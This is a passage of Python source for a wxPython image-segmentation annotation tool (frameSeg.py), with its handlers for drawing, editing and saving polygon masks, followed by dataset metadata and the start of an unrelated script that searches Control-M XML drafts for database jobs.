range(START_BUTTON_ID_CLASSES, START_BUTTON_ID_CLASSES + NUM_CLASSES):\r\n current_button = wx.Button(self, idxx, CLASS_NAMES[idxx - START_BUTTON_ID_CLASSES], wx.DefaultPosition,\r\n wx.DefaultSize, 0)\r\n self.buttons_classes.append(current_button)\r\n self.bSizer81.Add(self.buttons_classes[-1], 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5)\r\n\r\n # if current_operation == 'segment':\r\n self.bSizer81.ShowItems(show=False)\r\n bSizer1.Add(self.bSizer81, 0, wx.ALL, 5)\r\n\r\n bSizer3 = wx.BoxSizer(wx.HORIZONTAL)\r\n\r\n bSizer4 = wx.BoxSizer(wx.VERTICAL)\r\n\r\n bSizer4.Add((0, 0), 1, wx.EXPAND, 5)\r\n\r\n # self.m_bpButton1 = wx.BitmapButton(self, 76, wx.Bitmap(u\"arrow_left_half.png\", wx.BITMAP_TYPE_ANY),\r\n # wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW)\r\n\r\n bSizer4.Add((0, 0), 1, wx.EXPAND, 5)\r\n\r\n # self.m_button11 = wx.Button(self, wx.ID_ANY, u\"Previous CT\", wx.DefaultPosition, wx.DefaultSize, 0)\r\n # bSizer4.Add(self.m_button11, 0, wx.ALL, 5)\r\n\r\n bSizer3.Add(bSizer4, 0, wx.EXPAND, 5)\r\n\r\n bSizer8 = wx.BoxSizer(wx.VERTICAL)\r\n\r\n image = wx.Image(IMAGE_WIDTH, IMAGE_HEIGHT) # EmptyImage\r\n # image.SetData(np_prep_image.tostring())\r\n\r\n #\r\n self.drawPane = drawing_panel(self, image, 'contour', 20) # brush size\r\n # bSizer8.Add(self.drawPane, 1, wx.ALL | wx.EXPAND, 5)\r\n bSizer8.Add(self.drawPane, 1, wx.EXPAND, 5)\r\n # if current_operation == 'segment':\r\n self.buttons_classes[self.drawPane.selected_class].SetBackgroundColour(\r\n wx.Colour(CLASS_COLORS_RGB[self.drawPane.selected_class][0],\r\n CLASS_COLORS_RGB[self.drawPane.selected_class][1],\r\n CLASS_COLORS_RGB[self.drawPane.selected_class][2],\r\n 125))\r\n\r\n bSizer3.Add(bSizer8, 1, wx.EXPAND, 5)\r\n\r\n bSizer41 = wx.BoxSizer(wx.VERTICAL)\r\n\r\n bSizer41.Add((0, 0), 1, wx.EXPAND, 5)\r\n\r\n bSizer41.Add((0, 0), 1, wx.EXPAND, 5)\r\n\r\n # self.m_button111 = wx.Button(self, wx.ID_ANY, u\"Next\", wx.DefaultPosition, wx.DefaultSize, 0)\r\n # bSizer41.Add(self.m_button111, 0, wx.ALL | wx.ALIGN_RIGHT, 5)\r\n\r\n bSizer3.Add(bSizer41, 0, wx.EXPAND, 5)\r\n\r\n bSizer7 = wx.BoxSizer(wx.VERTICAL)\r\n\r\n bSizer3.Add(bSizer7, 1, wx.EXPAND, 5)\r\n\r\n bSizer1.Add(bSizer3, 1, wx.EXPAND, 5)\r\n\r\n self.initOperation()\r\n\r\n self.SetSizer(bSizer1)\r\n self.Layout()\r\n\r\n self.Centre(wx.BOTH)\r\n\r\n self.Bind(wx.EVT_MOVE, self.OnMove)\r\n self.Bind(wx.EVT_BUTTON, self.OnButtonClicked)\r\n self.Bind(wx.EVT_SCROLL, self.OnScrollChanged)\r\n self.Bind(wx.EVT_COMBOBOX, self.OnComboboxChanged)\r\n self.Bind(wx.EVT_CHAR_HOOK, self.OnKeyDown)\r\n self.Bind(wx.EVT_CHECKBOX, self.OnCheckBoxChanged)\r\n # self.m_comboBox11.Bind(wx.EVT_COMBOBOX, self.OnComboboxChanged)\r\n # this isn't supposed to be here, but otherwise it fails to draw the segmentation for the 1st slice\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n\r\n @property\r\n def current_slice(self):\r\n return self._current_slice\r\n\r\n @current_slice.setter\r\n def current_slice(self, value):\r\n if value < 0:\r\n self._current_slice = 0\r\n elif value > self.num_slices_current_axis - 1:\r\n self._current_slice = self.num_slices_current_axis - 1\r\n else:\r\n self._current_slice = value\r\n self.m_comboBox1.Value = str(self._current_slice + 1)\r\n\r\n def initOperation(self):\r\n if current_operation == 'segment':\r\n # show\r\n self.m_button6.Show()\r\n self.m_button31.Show()\r\n self.checkBox1.Show()\r\n self.checkBox2.Show()\r\n self.m_button31x.Show()\r\n self.bSizer81.ShowItems(show=True)\r\n # hide\r\n self.m_button31p.Hide()\r\n 
self.m_button31n.Hide()\r\n self.m_button31c.Hide()\r\n self.m_button31b.Hide()\r\n self.m_choiceClass.Hide()\r\n # enable\r\n self.m_button3.Enable()\r\n\r\n # bug\r\n #self.rbox.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT))\r\n self.rbox.Refresh()\r\n #self.bSizer2Ext.Layout()\r\n if current_operation == 'edit':\r\n # hide\r\n self.m_button6.Hide()\r\n self.m_button31.Hide()\r\n self.checkBox1.Hide()\r\n self.checkBox2.Hide()\r\n self.m_button31x.Hide()\r\n self.bSizer81.ShowItems(show=False)\r\n # show\r\n self.m_button31p.Show()\r\n self.m_button31n.Show()\r\n self.m_button31c.Show()\r\n self.m_button31b.Show()\r\n self.m_choiceClass.Show()\r\n # disable\r\n self.m_button3.Disable()\r\n # delete\r\n self.drawPane.contourPoints = []\r\n # bug\r\n self.rbox.Refresh()\r\n #self.rbox.Layout()\r\n\r\n def OnRadioBox(self, e):\r\n global current_operation\r\n global operation_changed\r\n #operation_changed = True\r\n current_operation = operations_list[self.rbox.GetSelection()]\r\n # self.__init__(self, \"segmentation\")\r\n self.initOperation()\r\n # self.mainLogin.Hide()\r\n self.Layout()\r\n # self.__init__(None, title=\"lala\")\r\n # self.Close()\r\n\r\n def OnMove(self, e):\r\n x, y = e.GetPosition()\r\n # print(\"current window position x = \", x, \" y= \", y)\r\n\r\n def OnKeyDown(self, e):\r\n # print(e.GetKeyCode())\r\n if e.GetKeyCode() == 32:\r\n # space -- save polygon\r\n self.drawPane.savePolygon()\r\n elif e.GetKeyCode() == 8:\r\n # backspace -- delete current vertex\r\n self.drawPane.deleteLastVertex()\r\n\r\n def OnButtonClicked(self, e):\r\n global polygons\r\n global polygons_to_be_deleted\r\n global current_polygon_to_be_deleted_idx\r\n global image_np_all_slices_segmentation\r\n global old_area_list\r\n global current_operation\r\n global operation_changed\r\n global FILE_PATH\r\n if e.Id == 76: # load left slice\r\n if self.current_slice > 0:\r\n # self.SaveCurrentSegmentation()\r\n self.current_slice -= 1\r\n self.m_slider1.Value = self.current_slice\r\n self.PrepAndChangeImage(self.current_slice)\r\n elif e.Id == 77: # load right slice\r\n if self.current_slice < self.num_slices_current_axis - 1:\r\n # self.SaveCurrentSegmentation()\r\n self.current_slice += 1\r\n self.m_slider1.Value = self.current_slice\r\n self.PrepAndChangeImage(self.current_slice)\r\n elif e.Id == 80: # proper erase?\r\n if current_operation == 'edit':\r\n oal = polygons_to_be_deleted[current_polygon_to_be_deleted_idx]\r\n polygons_new = []\r\n for elem in polygons:\r\n if elem[0] != oal[0]:\r\n polygons_new.append(elem)\r\n polygons_to_be_deleted = []\r\n current_polygon_to_be_deleted_idx = 0\r\n polygons = polygons_new.copy()\r\n self.drawPane.contourPoints = []\r\n image_np_all_slices_segmentation = np.zeros((IMAGE_HEIGHT, IMAGE_WIDTH, NUM_CLASSES), dtype=np.bool_)\r\n redrawSegmentationPolys(polygons)\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n self.m_button3.Disable()\r\n self.m_button31b.Disable()\r\n self.m_button31p.Disable()\r\n self.m_button31n.Disable()\r\n self.m_choiceClass.Disable()\r\n self.m_button31c.Disable()\r\n else:\r\n # self.drawPane.clear()\r\n # self.EraseCurrentSegmentation()\r\n self.drawPane.contourPoints = []\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n \"\"\"\r\n if self.m_button3.GetForegroundColour().RGB == 0:\r\n self.m_button3.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT))\r\n else:\r\n self.m_button3.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n 
\"\"\"\r\n elif e.Id == 81: # delete last vertex\r\n self.drawPane.deleteLastVertex()\r\n elif e.Id == 83: # save all\r\n self.SaveSegmentationToFile()\r\n elif e.Id == 84: # save polygon\r\n self.drawPane.savePolygon()\r\n # image_np_all_slices_segmentation = np.zeros_like(image_np_all_slices)\r\n elif e.Id == 85: # contour\r\n self.drawPane.setDrawingStyle('contour')\r\n self.m_button61.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT))\r\n self.m_button611.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button6111.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n\r\n elif e.Id == 86: # brush\r\n self.drawPane.setDrawingStyle('brush')\r\n self.m_button61.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button611.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT))\r\n self.m_button6111.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n\r\n elif e.Id == 89: # brush delete\r\n self.drawPane.setDrawingStyle('brushDelete')\r\n self.m_button61.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button611.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n self.m_button6111.SetForegroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT))\r\n elif e.Id >= START_BUTTON_ID_CLASSES and e.Id <= START_BUTTON_ID_CLASSES + NUM_CLASSES:\r\n for idxx in range(START_BUTTON_ID_CLASSES, START_BUTTON_ID_CLASSES + NUM_CLASSES):\r\n self.buttons_classes[idxx - START_BUTTON_ID_CLASSES].SetForegroundColour(\r\n wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT))\r\n\r\n self.buttons_classes[idxx - START_BUTTON_ID_CLASSES].SetBackgroundColour(\r\n wx.Colour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOW)))\r\n self.drawPane.selected_class = e.Id - START_BUTTON_ID_CLASSES\r\n self.buttons_classes[e.Id - START_BUTTON_ID_CLASSES].SetBackgroundColour(\r\n wx.Colour(CLASS_COLORS_RGB[self.drawPane.selected_class][0],\r\n CLASS_COLORS_RGB[self.drawPane.selected_class][1],\r\n CLASS_COLORS_RGB[self.drawPane.selected_class][2],\r\n 125))\r\n self.buttons_classes[e.Id - START_BUTTON_ID_CLASSES].SetForegroundColour(\r\n wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT))\r\n elif e.Id == 202:\r\n if len(old_area_list) > 0:\r\n polygons_new = []\r\n for elem in polygons:\r\n if elem[0] != old_area_list[-1]:\r\n polygons_new.append(elem)\r\n old_area_list = old_area_list[:-1]\r\n polygons = polygons_new.copy()\r\n self.drawPane.contourPoints = []\r\n image_np_all_slices_segmentation = np.zeros((IMAGE_HEIGHT, IMAGE_WIDTH, NUM_CLASSES), dtype=np.bool_)\r\n redrawSegmentationPolys(polygons)\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n elif e.Id == 203:\r\n if current_polygon_to_be_deleted_idx - 1 < 0:\r\n current_polygon_to_be_deleted_idx = len(polygons_to_be_deleted) - 1\r\n else:\r\n current_polygon_to_be_deleted_idx -= 1\r\n redrawSegmentationPolys(polygons_to_be_deleted, highlighted=current_polygon_to_be_deleted_idx)\r\n self.m_choiceClass.SetSelection(polygons_to_be_deleted[current_polygon_to_be_deleted_idx][1])\r\n print('pdbd idx', current_polygon_to_be_deleted_idx)\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n elif e.Id == 204:\r\n if current_polygon_to_be_deleted_idx + 1 > len(polygons_to_be_deleted) - 1:\r\n current_polygon_to_be_deleted_idx = 0\r\n else:\r\n current_polygon_to_be_deleted_idx += 1\r\n 
redrawSegmentationPolys(polygons_to_be_deleted, highlighted=current_polygon_to_be_deleted_idx)\r\n self.m_choiceClass.SetSelection(polygons_to_be_deleted[current_polygon_to_be_deleted_idx][1])\r\n print('pdbd idx', current_polygon_to_be_deleted_idx)\r\n\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n elif e.Id == 205:\r\n polygons_to_be_deleted = []\r\n self.m_button3.Disable()\r\n self.m_button31p.Disable()\r\n self.m_button31n.Disable()\r\n self.m_button31b.Disable()\r\n self.m_choiceClass.Disable()\r\n self.m_button31c.Disable()\r\n redrawSegmentationPolys(polygons)\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n elif e.Id == 207:\r\n self.m_button3.Disable()\r\n self.m_button31p.Disable()\r\n self.m_button31n.Disable()\r\n self.m_button31b.Disable()\r\n self.m_choiceClass.Disable()\r\n self.m_button31c.Disable()\r\n oal = polygons_to_be_deleted[current_polygon_to_be_deleted_idx]\r\n polygons_new = []\r\n for elem in polygons:\r\n if elem[0] != oal[0]:\r\n polygons_new.append(elem)\r\n else:\r\n polygons_new.append([elem[0], self.m_choiceClass.GetSelection(), elem[2], elem[3]])\r\n polygons = polygons_new.copy()\r\n polygons_to_be_deleted = []\r\n self.drawPane.contourPoints = []\r\n image_np_all_slices_segmentation = np.zeros((IMAGE_HEIGHT, IMAGE_WIDTH, NUM_CLASSES), dtype=np.bool_)\r\n redrawSegmentationPolys(polygons)\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n elif e.Id == 208: # prev\r\n file_dir = os.path.dirname(FILE_PATH)\r\n print(file_dir)\r\n file_list = sorted(os.listdir(file_dir))\r\n file_idx = file_list.index(os.path.basename(FILE_PATH))\r\n new_path = ''\r\n while file_idx > 0:\r\n file_idx -= 1\r\n if '.jpg' in file_list[file_idx]:\r\n new_path = file_list[file_idx]\r\n break\r\n if new_path != '':\r\n FILE_PATH = os.path.join(file_dir, new_path)\r\n self.Close()\r\n loadFile()\r\n operation_changed = True\r\n #redrawSegmentationPolys(polygons)\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n current_polygon_to_be_deleted_idx = 0\r\n #current_operation = operations_list[self.rbox.GetSelection()]\r\n # self.__init__(self, \"segmentation\")\r\n # change file path\r\n\r\n #self.initOperation()\r\n # self.mainLogin.Hide()\r\n # self.Layout()\r\n # self.__init__(None, title=\"lala\")\r\n # self.Close()\r\n elif e.Id == 209: # next\r\n file_dir = os.path.dirname(FILE_PATH)\r\n print(file_dir)\r\n file_list = sorted(os.listdir(file_dir))\r\n file_idx = file_list.index(os.path.basename(FILE_PATH))\r\n new_path = ''\r\n while file_idx < len(file_list)-1:\r\n file_idx += 1\r\n if '.jpg' in file_list[file_idx]:\r\n new_path = file_list[file_idx]\r\n break\r\n if new_path != '':\r\n FILE_PATH = os.path.join(file_dir, new_path)\r\n self.Close()\r\n loadFile()\r\n operation_changed = True\r\n #redrawSegmentationPolys(polygons)\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n current_polygon_to_be_deleted_idx = 0\r\n def OnScrollChanged(self, e):\r\n if e.Id == 78: # slice scroll\r\n # self.SaveCurrentSegmentation()\r\n self.current_slice = e.Position\r\n self.PrepAndChangeImage(self.current_slice)\r\n elif e.Id == 82: # contrast\r\n # self.SaveCurrentSegmentation()\r\n self.clahe = cv2.createCLAHE(clipLimit=e.Position, tileGridSize=(8, 8))\r\n self.PrepAndChangeImage(self.current_slice)\r\n\r\n def OnComboboxChanged(self, e):\r\n if e.Id == 79: # num_slice\r\n # self.SaveCurrentSegmentation()\r\n new_slice_index = e.Selection - 1\r\n self.current_slice = new_slice_index\r\n self.PrepAndChangeImage(self.current_slice)\r\n elif e.Id 
== 87: # brush size\r\n self.drawPane.brushSize = int(e.String)\r\n elif e.Id == 88: # view axis change\r\n if e.String != self.current_axis:\r\n self.current_axis = e.String\r\n self.current_slice = 0\r\n self.PrepAndChangeImage(self.current_slice)\r\n\r\n self.num_slices_current_axis = NUM_SLICES\r\n\r\n # reset slider + slice selector\r\n comboBox1Choices = list(map(str, range(1, self.num_slices_current_axis)))\r\n self.m_comboBox1.Items = comboBox1Choices\r\n\r\n self.m_slider1.Max = self.num_slices_current_axis\r\n\r\n def OnCheckBoxChanged(self, e):\r\n global HIDE_SEGMENTATION\r\n if e.Id == 210: # hide segmentation\r\n if self.checkBox2.GetValue() is True:\r\n HIDE_SEGMENTATION = True\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n else:\r\n HIDE_SEGMENTATION = False\r\n self.PrepAndChangeImage(plotAnnotationsOverlay())\r\n\r\n\r\n def PrepAndChangeImage(self, slice):\r\n # print(image_np_all_slices_normed.shape)\r\n try:\r\n c_w, c_h, _ = slice.shape\r\n except:\r\n slice = image_np_all_slices_normed\r\n # np_prep_image = np.array(slice, dtype=np.uint8)\r\n np_prep_image = slice\r\n c_w, c_h, _ = np_prep_image.shape\r\n image = wx.Image(c_h, c_w)\r\n image.SetData(np_prep_image)\r\n self.drawPane.changeImage(image)\r\n\r\n def SaveCurrentSegmentation(self):\r\n current_segmentation = self.drawPane.getCurrentSegmentation()\r\n image_np_all_slices_segmentation[:, :, self.current_slice] = np.maximum(\r\n image_np_all_slices_segmentation[:, :, self.current_slice], current_segmentation[:, :, 0])\r\n self.drawPane.clear()\r\n\r\n def EraseCurrentSegmentation(self):\r\n image_np_all_slices_segmentation[:, :, self.current_slice] = 0\r\n\r\n self.drawPane.clear()\r\n\r\n def SaveSegmentationToFile(self):\r\n np.savez_compressed(\r\n os.path.join(SEG_PATH_OUT, 'seg_' + os.path.basename(FILE_PATH).replace('.' + IMAGE_EXTENSION, '.npz')),\r\n np.array(image_np_all_slices_segmentation > 0, dtype=np.bool_))\r\n with open(os.path.join(SEG_PATH_OUT,\r\n 'seg_' + os.path.basename(FILE_PATH).replace('.' + IMAGE_EXTENSION, '_polys.pkl')),\r\n 'wb') as fp:\r\n pickle.dump(polygons, fp)\r\n if not os.path.exists(os.path.join(SEG_PATH_OUT, 'segmentation_preview')):\r\n os.makedirs(os.path.join(SEG_PATH_OUT, 'segmentation_preview'))\r\n cv2.imwrite(os.path.join(SEG_PATH_OUT, 'segmentation_preview',\r\n 'seg_rgb_' + os.path.basename(FILE_PATH).replace('.' 
+ IMAGE_EXTENSION, '.png')),\r\n plotAnnotationsOverlay()[:, :, ::-1])\r\n # current_annotations = plotAnnotations()\r\n # current_annotations = current_annotations[BORDER_PADDING:IMAGE_HEIGHT - BORDER_PADDING,\r\n # BORDER_PADDING:IMAGE_WIDTH - BORDER_PADDING, :]\r\n # current_annotations = cv2.cvtColor(current_annotations, cv2.COLOR_RGB2BGR)\r\n # cv2.imwrite(os.path.join(SEG_PATH_OUT, 'seg_' + os.path.basename(FILE_PATH)), current_annotations)\r\n\r\n def __del__(self):\r\n pass\r\n\r\n\r\n###########################################################################\r\n## Class display_frame\r\n###########################################################################\r\n\r\nclass display_frame(wx.Frame):\r\n def __init__(self, parent, title):\r\n self._current_slice = 0\r\n self.num_slices_current_axis = NUM_SLICES\r\n\r\n self.frame = wx.Frame.__init__(self, parent, id=wx.ID_ANY, title=title, pos=wx.DefaultPosition,\r\n size=wx.Size(1280, 768), style=wx.DEFAULT_FRAME_STYLE | wx.TAB_TRAVERSAL,\r\n name=u\"Seg\")\r\n\r\n self.SetSizeHints(wx.DefaultSize, wx.DefaultSize)\r\n\r\n bSizer1 = wx.BoxSizer(wx.VERTICAL)\r\n\r\n self.image = wx.Image(IMAGE_WIDTH, IMAGE_HEIGHT) # EmptyImage\r\n self.image.SetData(image_previous_segmentation_overlaid.tostring())\r\n\r\n self.bitmap = self.image.ConvertToBitmap()\r\n\r\n self.m_bitmap1 = wx.StaticBitmap(self, wx.ID_ANY, self.bitmap, wx.DefaultPosition, wx.DefaultSize, 0)\r\n bSizer1.Add(self.m_bitmap1, 1, wx.ALL | wx.EXPAND, 5)\r\n\r\n self.SetSizer(bSizer1)\r\n self.Layout()\r\n\r\n self.Centre(wx.BOTH)\r\n\r\n self.Bind(wx.EVT_SIZE, self.onResize)\r\n\r\n def redrawImage(self):\r\n self.dc = wx.ClientDC(self) # batman\r\n new_w, new_h = self.dc.GetSize()\r\n print(\"nwh\", new_w, new_h)\r\n if new_w != 0 and new_h != 0:\r\n self.bitmap = self.image.Scale(new_w, new_h).ConvertToBitmap()\r\n # self.dc.DrawBitmap(self.resized_bitmap, 0, 0)\r\n self.m_bitmap1.SetBitmap(self.bitmap)\r\n\r\n def onResize(self, e=None):\r\n W, H = self.m_bitmap1.Size\r\n if W > H:\r\n NewW = W\r\n NewH = W * H / W\r\n else:\r\n NewH = H\r\n NewW = H * W / H\r\n img = self.image\r\n img = img.Scale(NewW, NewH)\r\n self.m_bitmap1.SetBitmap(wx.Bitmap(img))\r\n e.Skip()\r\n self.Refresh()\r\n\r\n\r\ndef plotPreviousSegmentations(path):\r\n for current_image_path in os.listdir(path):\r\n if not 'jpg' in current_image_path or 'png' in current_image_path:\r\n continue\r\n if os.path.exists(os.path.join(path, 'segmentation_preview',\r\n 'seg_rgb_' + os.path.basename(current_image_path).replace('.' + IMAGE_EXTENSION,\r\n '.png'))):\r\n continue\r\n image_np_all_slices_normed_inside = []\r\n image_np_all_slices_segmentation_inside = []\r\n try:\r\n image_np_all_slices_normed_inside = cv2.imread(os.path.join(SEG_PATH_OUT, current_image_path))\r\n image_np_all_slices_segmentation_inside = np.load(\r\n os.path.join(path, 'seg_' + os.path.basename(current_image_path).replace('.jpg', '.npz')))[\r\n 'arr_0']\r\n image_np_all_slices_normed_inside = cv2.copyMakeBorder(image_np_all_slices_normed_inside, BORDER_PADDING, BORDER_PADDING, BORDER_PADDING, BORDER_PADDING, cv2.BORDER_CONSTANT)\r\n if not os.path.exists(os.path.join(path, 'segmentation_preview')):\r\n os.makedirs(os.path.join(path, 'segmentation_preview'))\r\n cv2.imwrite(os.path.join(path, 'segmentation_preview',\r\n 'seg_rgb_' + os.path.basename(current_image_path).replace('.' 
+ IMAGE_EXTENSION,\r\n '.png')),\r\n plotAnnotationsOverlay2(image_np_all_slices_normed_inside, image_np_all_slices_segmentation_inside))\r\n except:\r\n pass\r\n\r\ndef loadFile():\r\n global image_previous_segmentation_overlaid\r\n global image_np_all_slices_segmentation\r\n global polygons\r\n global image_np_all_slices_normed\r\n global IMAGE_HEIGHT, IMAGE_WIDTH, NUM_SLICES\r\n global current_image\r\n global image_np_all_slices\r\n global PREV_FILE_PATH\r\n\r\n current_image = cv2.imread(FILE_PATH, 1)\r\n current_image = cv2.copyMakeBorder(current_image, BORDER_PADDING, BORDER_PADDING, BORDER_PADDING,\r\n BORDER_PADDING, cv2.BORDER_CONSTANT)\r\n current_image = cv2.cvtColor(current_image, cv2.COLOR_BGR2RGB)\r\n\r\n image_np_all_slices = current_image\r\n\r\n #if image_np_all_slices.shape[0] == 2300:\r\n # image_np_all_slices = cv2.resize(image_np_all_slices, None, fx=0.5, fy=0.5)\r\n\r\n IMAGE_HEIGHT, IMAGE_WIDTH, NUM_SLICES = image_np_all_slices.shape\r\n image_np_all_slices_normed = image_np_all_slices.copy()\r\n try:\r\n\r\n current_listdir = sorted(os.listdir(os.path.dirname(FILE_PATH)))\r\n\r\n current_basename = os.path.basename(FILE_PATH)\r\n\r\n current_idx = current_listdir.index(current_basename)\r\n\r\n putative_previous_basename = current_listdir[current_idx -1]\r\n\r\n if not (current_basename.split('_')[1] == putative_previous_basename.split('_')[1]):\r\n raise ValueError('No previous frames found.')\r\n\r\n\r\n image_previous_segmentation_overlaid = cv2.imread(os.path.join(SEG_PATH_OUT, 'segmentation_preview',\r\n 'seg_rgb_' + putative_previous_basename.replace('.' + IMAGE_EXTENSION,\r\n '.png')))\r\n image_previous_segmentation_overlaid = image_previous_segmentation_overlaid[:, :, ::-1]\r\n PREV_FILE_PATH = putative_previous_basename.split('.')[0]\r\n except:\r\n image_previous_segmentation_overlaid = []\r\n try:\r\n # current_image_seg = np.load(os.path.join(os.path.dirname(FILE_PATH), 'seg_'+os.path.basename(FILE_PATH).replace('.png', '.npz')))\r\n image_np_all_slices_segmentation = \\\r\n np.load(os.path.join(SEG_PATH_OUT,\r\n 'seg_' + os.path.basename(FILE_PATH).replace('.' + IMAGE_EXTENSION, '.npz')))[\r\n 'arr_0']\r\n #if image_np_all_slices_segmentation.shape[0] == 2300:\r\n # image_np_all_slices_segmentation = np.array(resize(image_np_all_slices_segmentation, (1150, 2118),preserve_range=True), dtype=np.bool_)\r\n with open(os.path.join(SEG_PATH_OUT,\r\n 'seg_' + os.path.basename(FILE_PATH).replace('.' 
+ IMAGE_EXTENSION, '_polys.pkl')),\r\n 'rb') as fp:\r\n polygons_old = pickle.load(fp)\r\n #areas = []\r\n polygons = removePolygonDuplicates(polygons_old)\r\n #remove duplicates somehow\r\n #for p in polygons_old:\r\n # print(p[0])\r\n #current_area = int(p[0])\r\n # if current_area not in areas:\r\n # polygons.append(p)\r\n #areas.append(current_area)\r\n #areas = list(set(areas))\r\n # for p in polygons:\r\n # print(p[0])\r\n\r\n except:\r\n image_np_all_slices_segmentation = np.zeros((IMAGE_HEIGHT, IMAGE_WIDTH, NUM_CLASSES), dtype=np.bool_)\r\n polygons = []\r\n\r\n\r\nif __name__ == '__main__':\r\n app = wx.App(False)\r\n\r\n current_operation = 'segment' # selectOperation()\r\n image_path_list = []\r\n\r\n if current_operation == 'segment' or current_operation == 'edit':\r\n FILE_PATH = getSingleFilePath(\"*.png;*.jpg;*.jpeg;*.JPEG;*.PNG;\")\r\n elif current_operation == 'cancel':\r\n sys.exit(0)\r\n\r\n IMAGE_EXTENSION = os.path.basename(FILE_PATH).split('.')[-1]\r\n\r\n SEG_PATH_OUT = os.path.dirname(FILE_PATH)\r\n\r\n # plot previous segmentations\r\n previousSegemntationPlotThread = threading.Thread(target=plotPreviousSegmentations, args=[SEG_PATH_OUT])\r\n previousSegemntationPlotThread.start()\r\n\r\n loadFile()\r\n\r\n while operation_changed:\r\n print('new frame instance')\r\n top = seg_frame(None, title=os.path.basename(FILE_PATH).split('.')[0])\r\n print('instancing')\r\n try:\r\n if image_previous_segmentation_overlaid != []:\r\n print('bottom found')\r\n if PREV_FILE_PATH != '':\r\n bottom = display_frame(top, title=os.path.basename(PREV_FILE_PATH).split('.')[0])\r\n else:\r\n bottom = display_frame(top, title=_(\"Previous segmentation\"))\r\n bottom.SetPosition((0, 0))\r\n bottom.Show()\r\n except:\r\n pass\r\n top.Show()\r\n print('showing')\r\n app.MainLoop()\r\n print('end main loop')\r\n","repo_name":"onorabil/frameSegmentation","sub_path":"frameSeg.py","file_name":"frameSeg.py","file_ext":"py","file_size_in_byte":62766,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"28668921561","text":"import os\nimport sys\nimport time\nimport xml.etree.ElementTree as ET\n\n\ndef finder(schemaName, resourceName):\n numOfFoundJobs = 0\n schemaName = schemaName.lower()\n resourceName = resourceName.lower()\n path = '\\\\\\\\ntsrv1\\\\tohna\\\\Control-M_Project\\\\Full-Drafts-Prod'\n os.chdir(path)\n draftFiles = sorted(os.listdir(os.getcwd()), key=os.path.getmtime)\n lastDraftFile = draftFiles[-1]\n tree = ET.parse(lastDraftFile)\n root = tree.getroot()\n resultList = []\n for Table in root:\n tableName = str(Table.get('FOLDER_NAME'))\n orderMethod = str(Table.get('FOLDER_ORDER_METHOD'))\n for job in Table.iter('JOB'):\n tempList = []\n listRow = \"\\n**************************************\\n\\nTable : \" + tableName + \" - UserDaily : \" + orderMethod\n tempList.append(listRow)\n jobName = job.get('JOBNAME')\n nodeId = job.get('NODEID')\n applType = job.get('APPL_TYPE')\n if applType not in \"DATABASE\":\n continue\n if not nodeId:\n nodeId = \"None\"\n listRow = \"-->> Job : \" + jobName + \" - Agent : \" + nodeId\n tempList.append(listRow)\n loopObjectResult = []\n loopObjectResult = loopObject(job, schemaName, resourceName)\n if loopObjectResult != False and loopObjectResult != None:\n for loopListRow in loopObjectResult:\n tempList.append(loopListRow)\n numOfFoundJobs += 1\n resultList.append(tempList)\n for subList in resultList:\n print(\"\\n\".join(subList))\n 
print(\"\\n**************************************\\nTotal number of jobs found : \", numOfFoundJobs)\n\n\ndef getVariableType(i_VarName):\n dict = {\n \"%%FTP-LPATH1\": \"File Trans Left Path\",\n \"%%FTP-LPATH2\": \"File Trans Left Path\",\n \"%%FTP-LPATH3\": \"File Trans Left Path\",\n \"%%FTP-LPATH4\": \"File Trans Left Path\",\n \"%%FTP-LPATH5\": \"File Trans Left Path\",\n \"%%FTP-RPATH1\": \"File Trans Right Path\",\n \"%%FTP-RPATH2\": \"File Trans Right Path\",\n \"%%FTP-RPATH3\": \"File Trans Right Path\",\n \"%%FTP-RPATH4\": \"File Trans Right Path\",\n \"%%FTP-RPATH5\": \"File Trans Right Path\",\n \"%%FTP-RUSER\": \"File Trans Left User\",\n \"%%FTP-RUSER\": \"File Trans Right User\",\n \"%%FTP-ACCOUNT\": \"File Trans Account\",\n \"%%FTP-LHOST\": \"File Trans Left Host\",\n \"%%FTP-RHOST\": \"File Trans Right Host\",\n \"%%DB-STP_SCHEM\" : \"DB Schema\",\n \"%%DB-STP_PACKAGE\": \"DB PKG Name\",\n \"%%DB-STP_NAME\": \"DB SP Name\",\n \"%%INF-WORKFLOW\": \"INF WF Name\"\n }\n if i_VarName in dict:\n return dict[i_VarName]\n else:\n return i_VarName\n\n\ndef loopObject(objectName, schemaName, resourceName):\n tempList = []\n 